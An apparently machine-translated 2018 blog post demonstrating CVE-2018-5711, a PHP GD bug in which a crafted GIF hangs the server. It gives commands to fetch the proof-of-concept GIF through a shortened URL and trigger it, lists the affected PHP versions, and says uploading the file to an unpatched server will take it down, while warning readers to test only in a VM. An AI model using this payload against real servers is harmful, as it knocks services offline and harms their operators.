Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy again this month
Dazzle Yi Three years ago (2018-02-03) Industry trends one thousand three hundred and forty-eight
There are so many talents in China. Orange, a hacker in Taiwan, has found a vulnerability, No. PHP cve-2018-5711. This vulnerability can instantly shut down the server supporting PHP. I will use Kali 2017.3 virtual machine to demonstrate it.
1、 Check if my virtual machine has a PHP GD library
1. Run command:
php -m | grep -i gd
2. If GD doesn't appear in the above figure, we need to install it. Run command
apt-get install php-gd。
2、 Generating malicious GIF files
curl -L https://git.io/vN0n4 | xxd -r > poc.gif
2. Run the top command to see my CPU usage
3. Testing malicious code:
php -r 'imagecreatefromgif("poc.gif");'
The CPU rose to 100% instantly. I want to run the top command again. I can't do a CPU comparison chart. I have to restart my Kali.
The scope of versions affected by this vulnerability is as follows:
PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1
If the server supports PHP GD library, upload the generated poc.gif, and the server will be down. Finally, I would like to solemnly say that some servers have not been fixed for this loophole. If you make a prank, it will cause economic losses to the other party and violate the state security Law, so be sure to test in the virtual machine, understand the principle of this vulnerability.